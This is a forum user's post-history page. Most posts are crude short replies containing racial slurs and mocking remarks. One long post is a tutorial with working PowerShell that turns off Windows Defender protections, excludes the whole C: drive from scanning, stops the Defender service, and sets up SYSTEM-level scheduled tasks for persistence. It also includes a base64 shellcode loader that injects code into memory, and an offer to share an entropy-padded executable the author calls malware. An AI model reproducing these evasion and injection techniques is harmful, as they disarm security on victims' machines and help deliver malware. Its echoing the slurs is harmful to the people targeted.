User Controls

  1. 1
  2. 2
  3. 3
  4. ...
  5. 30
  6. 31
  7. 32
  8. 33
  9. 34
  10. 35
  11. ...
  12. 1426
  13. 1427
  14. 1428
  15. 1429

Posts by Sophie

  1. Sophie Pedophile Tech Support
    Originally posted by Wariat i remember what he told me now. he said that teen girls have no power or money or rely on their parents just to live so you got to think youre the catch or desirsble and not them - and have power and they should want you not you them or chase them or some shit like that. star trek wat u fink?

    Not the whole picture but there is a grain of truth in there. No woman of any age likes a desperate guy, or someone that comes across as such.
  2. Sophie Pedophile Tech Support
    Originally posted by troon lol, who's fucking with shit, i neva wrote that?

    ETA: yes i did, a year ago. vinny is right, i have an iq of 65. fuck you vinny, who gives a shit I get more sex than you.

    Somehow, someway this post reminded me of this one hacker girl, maybe you know her. She runs a site called something like vulnerablebrokenthings.com she's actually pretty talented.
  3. Sophie Pedophile Tech Support
    Originally posted by Bradley This isn't a real charity

    He's right though, performative charity is just self-aggrandizement in disguise.
  4. Sophie Pedophile Tech Support
    Originally posted by vindicktive vinny can a englishman be wrong at english ?

    Yep. Because the language exists outside of the person speaking it. And necessarily it must. Because if it didn't it'd be no good for communicating.

    Think about it like this, when a kid is born to English parents are the sounds the kid is making English sounds? The kid is English after all. So by your logic, yes. But that is not commensurate with reality.
  5. Sophie Pedophile Tech Support
    Originally posted by Bradley Why? They need drugs not groceries

    If they don't need groceries they don't need food stamps.
  6. Sophie Pedophile Tech Support
    Originally posted by Bradley I am looking for the thread where we can post and before the posts are then taken and put in that thread Michael Myers

    Dead nigga memorial link at the bottom.

    https://niggasin.space/page/about
  7. Sophie Pedophile Tech Support
    Originally posted by Bradley Ask the people is the worst advice you could've given me, even worse than two days ago when i called Sudo from the store for dinner advice and he couldn't understand that TARGET doesn't have gator and crawdads

    It's tradition. We don't get to decide what it says. And with we i mean those of us who have a personal custom one.
  8. Sophie Pedophile Tech Support
    That's right it's another issue of Sophie's Cyber Shenanigans[Anti Telemetry(Again!) and More!] Edition. With even more scripts, more flavor text, and the best part is i did all the boring stuff for you so you don't have to.


    Ever want to write malware, exploits, a crypter or what have you and not have Micrococks have a copy of your source and final product before you even have your C2 online? Yeah? Well first of all use Windows Server 2016 Enterprise Edition and configure it properly when installing. Or get the Windows Deployment Kit for a custom Win10 install. But protip just running Win2016 Enterprise is easiest and works best IMO.

    However ain't nobody got time for that and you already have your Win10 box and you want to use that one, i feel you.

    If you're a skid and just want to download some hacking tools and start blasting but can't because WinDefend keeps quarantining everything as either potential malware, hacking tool, and/or PUP.
    Or if you are a casual user, you might like Micrococks not to have all your data by ways of telemetry. I posted a thread with scripts and source to kill telemetry and for a Windows Service in C++ to automate the whole lot here in T&T as well, but no need to open another tab, i gotchu fam.

    Both with a lot of telemetry and automated housekeeping that Windows does, Windows Defender is responsible for the most egregious shit. Hence the title of the thread. I wrote this script to rectify some of that.

    ##-!NOTICE!-##
    # You may want to give this a look over if you simply want to maim
    # not kill Windows Defender

    Write-Host "[+]If you don't know what you're doing, stop executing this script." -f 'gre'
    Read-Host "If you do know, press any key to continue..." -f 'gre'

    try {
    New-Item -Path 'HKLM:\SOFTWARE\Policies\Microsoft'-Name "Windows Defender" -Force -ea 0 | Out-Null
    # Pretty self explanatory
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
    # This is the kind of shit Windows gets up to when it thinks you're idling
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableRoutinelyTakingAction" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
    # Spynet? No, doesn't seem suspicious to me guvner, honest
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SpyNetReporting" -Value 0 -PropertyType DWORD -Force -ea 0 | Out-Null
    # Windows assumes consent, don't touch my freaking samples bro. Not cool
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SubmitSampleConsent" -Value 0 -PropertyType DWORD -Force -ea 0 | Out-Null
    # No one needs to know...
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MRT" -Name "DontReportInfectionInformation" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
    # These features can die in a fire, look it over in case you'd like to comment
    # out some lines if you wanna play it safe, i like living on the edge
    if (-Not ((GetWmiObject -class Win32 OperatingSystem).Version -eq "6.1.7601")) {
    Add-MpPreference -ExclusionPath "C:\" -Force -ea 0 | Out-Null
    Set-MpPreference -DisableArchiveScanning $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableBehaviorMonitoring $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableBlockAtFirstSeen $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableCatchupFullScan $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableCatchupQuickScan $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableIntrusionPreventionSystem $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableIOAVProtection $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableRealTimeMonitoring $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableRemovableDriveScanning $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableRestorePoint $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableScanningNetworkFiles $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableScriptScanning $true -Force -ea 0 | Out-Null
    Set-MpPreference -EnableControlledFolderAcces Disabled -Force -ea 0 | Out-Null
    Set-MpPreference -EnablenetworkProtection AuditMode -Force -ea 0 | Out-Null
    Set-MpPreference -MAPSReporting Disabled -Force -ea 0 | Out-Null
    Set-MpPreference -SubmitSampleConsent NeverSend -Force -ea 0 | Out-Null
    Set-MpPreference -PUAProtection Disabled -Force -ea 0 | Out-Null
    }
    } catch {
    Write-Warning "Failed to disable Windows Defender component"
    }

    # If this errors out you either don't have the right permissions or the service has already been stopped
    try {
    Get-Service WinDefend | Stop-Service -Force
    Set-itemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\services\Windefend" -name "Start" -Value 4 -Type DWORD -Force

    } catch {
    Write-Warning "Failed to disable WinDefend Service"

    }


    Make a text file and paste the code block. Save it as something like windef.ps1.

    I would recommend running this as at least a Domain Admin, or straight up NT AUTHORITY\System if you can. A simple way to do that(Kinda) is to create a scheduled task and set it to run at startup as the SYSTEM user. The commands for doing so would look a lot like this


    schtasks /create /tn 'windef' /tr powershell %WINDIR%\windev.ps1 /sc onstart /ru System


    Change the details as necessary.

    If you want to take this a step further save the following as a .bat file and run it as administrator. This script was apart of the original ensemble i had in a previous anti-telemetry thread


    @ECHO OFF
    SETLOCAL

    echo Uninstalling updates relevant to telemetry ops
    echo Delete KB2902907 (Microsoft Security Essentials)
    start "title" /b /wait wusa.exe /kb:2902907 /uninstall /quiet /norestart

    echo Delete KB3022345 (telemetry)
    start "title" /b /wait wusa.exe /kb:3022345 /uninstall /quiet /norestart

    echo Delete KB3068708 (telemetry)
    start "title" /b /wait wusa.exe /kb:3068708 /uninstall /quiet /norestart

    echo Delete KB3080149 (Telemetry)
    start "title" /b /wait wusa.exe /kb:3080149 /uninstall /quiet /norestart


    In order to be thorough and have a good use for another older script of mine we'll be blocking domains Micro$oft runs in order to receive things like telemetry and samples.

    Ideally you would blacklist these in your router. Alternatively we can basically null-route them for all intents and purposes at the OS Networking level. What we will need is a BlackHole server, a Proxy Auto Config script, and a web server to serve the proxy config locally.

    Here's my implementation of a HTTP server in powershell.

    # PowerShell RegEdit and HTTP Server
    $registryPath = "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\"

    $Name = "EnableLegacyAutoProxyFeatures"

    $value = "1"

    # Check to see if an entry exists and set value
    # If it doesn't create the appropriate subkey
    if(!(Test-Path $registryPath)) {
    New-Item -Path $registryPath -Force | Out-Null
    New-ItemProperty -Path $registryPath -Name $name -Value $value `

    -PropertyType DWORD -Force | Out-Null
    }

    else {
    New-ItemProperty -Path $registryPath -Name $name -Value $value `
    -PropertyType DWORD -Force | Out-Null
    }

    # Http Server
    $http = [System.Net.HttpListener]::new()

    # Listen at 8080
    $http.Prefixes.Add("http://localhost:8080/")

    # Start the Http Server
    $http.Start()


    # Confirm
    if ($http.IsListening) {
    write-host " HTTP Server Listening " -f 'gre'
    write-host " Please direct Windows Auto Proxy Config to http://127.0.0.1/:8080 " -f 'gre'
    }


    # Server Loop
    while ($http.IsListening) {

    $context = $http.GetContext()

    if ($context.Request.HttpMethod -eq 'GET' -and $context.Request.RawUrl -eq '/') {

    # Log to terminal
    write-host "$($context.Request.UserHostAddress) => $($context.Request.Url)" -f 'gre'

    # Get proxy.pac data
    # Don't forget to change this to reflect the situation at your end
    [string]$data = Get-Content "C:\some\path\proxy.pac" -Raw

    # Field the request
    $buffer = [System.Text.Encoding]::UTF8.GetBytes($data)
    $context.Response.ContentLength64 = $buffer.Length
    $context.Response.OutputStream.Write($buffer, 0, $buffer.Length) # Data stream
    $context.Response.OutputStream.Close() # Close

    }


    Proxy Auto Config Scripts have to be in JavaScript. I have made some adjustments to this one with regards to the one i had in my other thread. Basically we're not going to bother routing normal traffic through tor this time.

    script type="application/x-ns-proxy-autoconfig">

    // Declare vars
    var normal = "DIRECT";
    var blackhole = "PROXY 127.0.0.1:55555";

    function FindProxyForURL(url, host) {

    if (dnsResolve(host) || shExpMatch(host, '*.local')
    || isInNet(dnsResolve(host), '10.0.0.0', '255.0.0.0')
    || isInNet(dnsResolve(host), '172.16.0.0', '255.240.0.0')
    || isInNet(dnsResolve(host), '192.168.0.0', '255.255.0.0')
    || isInNet(dnsResolve(host), '127.0.0.0', '255.255.255.0')) {
    return normal;
    }

    if (shExpMatch((url, "*oca.telemetry.microsoft.com*")
    || shExpMatch(url, "*telecommand.telemetry.microsoft.com*")
    || shExpMatch(url, "*oca.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*a-0001.a-msedge.net*")
    || shExpMatch(url, "*a-0002.a-msedge.net*")
    || shExpMatch(url, "*a-0003.a-msedge.net*")
    || shExpMatch(url, "*a-0004.a-msedge.net*")
    || shExpMatch(url, "*a-0004.a-msedge.net*")
    || shExpMatch(url, "*a-0005.a-msedge.net*")
    || shExpMatch(url, "*a-0006.a-msedge.net*")
    || shExpMatch(url, "*a-0006.a-msedge.net*")
    || shExpMatch(url, "*a-0007.a-msedge.net*")
    || shExpMatch(url, "*a-0008.a-msedge.net*")
    || shExpMatch(url, "*a-0009.a-msedge.net*")
    || shExpMatch(url, "*i1.services.social.microsoft.com")
    || shExpMatch(url, "*telecommand.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*sqm.df.telemetry.microsoft.com*")
    || shExpMatch(url, "telemetry.appex.bing.net*")
    || shExpMatch(url, "*settings-sandbox.data.microsoft.com*")
    || shExpMatch(url, "*pre.footprintpredict.com")
    || shExpMatch(url, "*aidps.atdmt.com*")
    || shExpMatch(url, "*aka-cdn-ns.adtech.de*")
    || shExpMatch(url, "*a-msedge.net*")
    || shExpMatch(url, "*b.rad.msn.com*")
    || shExpMatch(url, "*az361816.vo.msecnd.net*")
    || shExpMatch(url, "*b.ads1.msn.com*")
    || shExpMatch(url, "*b.ads2.msads.net*")
    || shExpMatch(url, "*watson.telemetry.microsoft.com*")
    || shExpMatch(url, "*wes.df.telemetry.microsoft.com*")
    || shExpMatch(url, "*bs.serving-sys.com*")
    || shExpMatch(url, "*redir.metaservices.microsoft.com*")
    || shExpMatch(url, "*reports.wes.df.telemetry.microsoft.com*")
    || shExpMatch(url, "*cs1.wpc.v0cdn.net*")
    || shExpMatch(url, "*corpext.msitadfs.glbdns2.microsoft.comt*")
    || shExpMatch(url, "*df.telemetry.microsoft.com*")
    || shExpMatch(url, "*services.wes.df.telemetry.microsoft.com*")
    || shExpMatch(url, "*watson.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*sqm.telemetry.microsoft.com*")
    || shExpMatch(url, "*sqm.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*watson.ppe.telemetry.microsoft.com*")
    || shExpMatch(url, "*telemetry.microsoft.com*")
    || shExpMatch(url, "*telemetry.urs.microsoft.com*")
    || shExpMatch(url, "*survey.watson.microsoft.com*")
    || shExpMatch(url, "*watson.live.com*")
    || shExpMatch(url, "*vortex-sandbox.data.microsoft.com*")
    || shExpMatch(url, "*settings-win.data.microsoft.com*")
    || shExpMatch(url, "*watson.microsoft.com*")
    || shExpMatch(url, "*db3aqu.atdmt.com*")
    || shExpMatch(url, "*diagnostics.support.microsoft.com*")
    || shExpMatch(url, "*statsfe2.update.microsoft.com.akadns.net*")
    || shExpMatch(url, "*fe2.update.microsoft.com.akadns.net*")
    || shExpMatch(url, "*schemas.microsoft.akadns.net*")
    || shExpMatch(url, "*feedback.microsoft-hohm.com*")
    || shExpMatch(url, "*feedback.search.microsoft.com*")
    || shExpMatch(url, "*statsfe1.ws.microsoft.com*")
    || shExpMatch(url, "*statsfe1.ws.microsoft.com*")
    || shExpMatch(url, "*c.atdmt.com*")) {
    // This list may be incomplete and/or slightly outdated
    // TODO: Fix that
    return blackhole;

    } else {
    return normal;
    }
    }
    </script>


    For a perfectly adequate blackhole server, pip has you covered. If you have the Python interpreter and pip installed you can use the following commands to grab the server in question.
    pip install tcp_blackhole


    Easy. When you're invoking the script either through 'python -m tcp_blackhole.py' or by calling it from a different script/utility make sure the argument for http mode is set to True. And set the port argument to 55555. So that it's commensurate with the PAC Script

    To persist this state of affairs once everything is in place, another scheduled task may be in order.
    schtasks /create /tn 'StageProxyOps' /tr powershell %WINDIR%\HTTP-Proxy-Server.ps1 /sc onstart /ru System


    Which reminds me, if you want to try something a little more pro-active with regards to the script that kill WinDefender i generated the following

    Set-StrictMode -Version 2
    $dQA = @"
    using System;
    using System.Runtime.InteropServices;
    namespace c5qI1 {
    public class func {
    [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
    [Flags] public enum MemoryProtection { ReadWrite = 0x04, Execute= 0x10 }
    [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
    [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, int flNewProtect,out int lpflOldProtect);
    [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
    }
    }
    "@

    $g_ = New-Object Microsoft.CSharp.CSharpCodeProvider
    $kp_ = New-Object System.CodeDom.Compiler.CompilerParameters
    $kp_.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
    $kp_.GenerateInMemory = $True
    $qwx = $g_.CompileAssemblyFromSource($kp_, $dQA)

    [Byte[]]$gycNB = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1XBvd2Vyc2hlbGwgLU5vUCAtZXhlYyBieXBhc3MgLlwlV0lORElSJVx3aW5leGVjMi5wczEA")
    [Uint32]$h9koM = 0

    $vnJp = [c5qI1.func]::VirtualAlloc(0, $gycNB.Length + 1, [c5qI1.func+AllocationType]::Reserve -bOr [c5qI1.func+AllocationType]::Commit, [c5qI1.func+MemoryProtection]::ReadWrite)
    if ([Bool]!$vnJp) { $global:result = 3; return }
    [System.Runtime.InteropServices.Marshal]::Copy($gycNB, 0, $vnJp, $gycNB.Length)

    if ([c5qI1.func]::VirtualProtect($vnJp,[Uint32]$gycNB.Length + 1, [c5qI1.func+MemoryProtection]::Execute, [Ref]$h9koM) -eq $true ) {
    [IntPtr] $yU_ = [c5qI1.func]::CreateThread(0,0,$vnJp,0,0,0)
    if ([Bool]!$yU_) { $global:result = 7; return }
    $nQ_ = [c5qI1.func]::WaitForSingleObject($yU_, [c5qI1.func+Time]::Infinite)
    }


    As you can see this powershell script has inline C#, that's to build a special DLL that will mimic kernel32 DLL, but for our ends. Kernel32.dll in short is involved with memory management, I/O, and it's process lives in kernelland. Which is good. A bit further down you can see a Base64 encoded string, this is actually encoded shellcode and we're going to use functions imported from kernel32.dll to inject that shellcode(once decoded) into memory using the CreateRemoteThread Method. Once injected it's going to fire off the equivalent of this command: powershell -NoP -exec bypass -c .\%WINDIR%\windef.ps1.

    As you can tell it's going to assume the WinDefKiller script lives in the %WINDIR% and is called windef.ps1. The point being that when done like this you won't be running the script from your user context but it will run in the context of the process doing the invoking.

    Anyway i was bored so i made some things i made some stuff to drop the WinDefKiller script in it's expected spot, automatically launch it through the script you see above and on top of that also add a scheduled task. then i put it all together into one big beautiful executable and padded the executable out to the point of low entropy in order to fly under the radar while Windows Defender still lives. It's basically malware, so if you are feeling adventerous shoot me a message and i may send you a precompiled executable. For fully automated Windows Defender murdering madness.

    Here's what it looks like on the inside:



    Anyway i hope you found all that at least somewhat informative, but mostly useful. I genuinely despise the way Micro$oft goes about these things. Unfortunately I'm gonna have to make a new edition of this thread for Windows 11 pretty soon, i think.
  9. Sophie Pedophile Tech Support
    Originally posted by Michael Myers Two microdoses of 1P-LSD, 20g each. And something that's called Galaxy Rise? No idea what it is, but it was offered for free so I accepted it.

    Galaxy Rise sounds like a name the street or a vendor gave to some substance.
  10. Sophie Pedophile Tech Support
    Being homeless is a choice.
  11. Sophie Pedophile Tech Support
    It should be a felony tbh.
  12. Sophie Pedophile Tech Support
    Originally posted by cigreting I thought this fred was going to be about how warioat is into licking guys assholes now

    Me too to be honest.
  13. Sophie Pedophile Tech Support
    If so, i hate to say it but nothing of value was lost.
  14. Sophie Pedophile Tech Support
    So just London then?
  15. Sophie Pedophile Tech Support
    Two glizzies and a Snack Pack? That would be easy to top. What are we going for though, best fast food? Best home-cooked? Besides my skills and talents, which are considerable. I can also cook a killer homemade meal.
  16. Sophie Pedophile Tech Support
    Originally posted by Jiggaboo_Johnson Yes, not that I live there anymore but my dad is always going on about the cops.

    Apparently they are so short staffed at the moment that if you report a non violent crime it probably wont be investigated…he was saying something about if your home is burgled they will only come out on certain days according to your house number

    So even numbers get a visit mon tue wed…odd number houses tue thurs sat etc.

    Fucking lol

    You should communicate this to a merry band of burglars and pick pockets.
  17. Sophie Pedophile Tech Support
    Do the police not have a non-emergency number in the UK? We have the emergency number and a regular ass number that'll put you through to the cops on phone duty at the precinct's operations center.
  18. Sophie Pedophile Tech Support
    Originally posted by Kafka Mik taught me how to maim people. You should be scared of your own ignorance if you think the worst that can happen is being hit.

    When Bradley was having street fights were you studying the blade?
  19. Sophie Pedophile Tech Support
    Originally posted by Steven I believe you.

    Obviously. When someone says "true story" it has to be a true story, them's the rules.
  20. Sophie Pedophile Tech Support
    Originally posted by Sudo You really know how to groom your way into my heart ❤️ let's take a hot air balloon ride and see where it goes

    I know where this is going, someway somehow i'll have a tragic hot air ballooning accident. And we'll be a nigga down ;-;
  1. 1
  2. 2
  3. 3
  4. ...
  5. 30
  6. 31
  7. 32
  8. 33
  9. 34
  10. 35
  11. ...
  12. 1426
  13. 1427
  14. 1428
  15. 1429
Jump to Top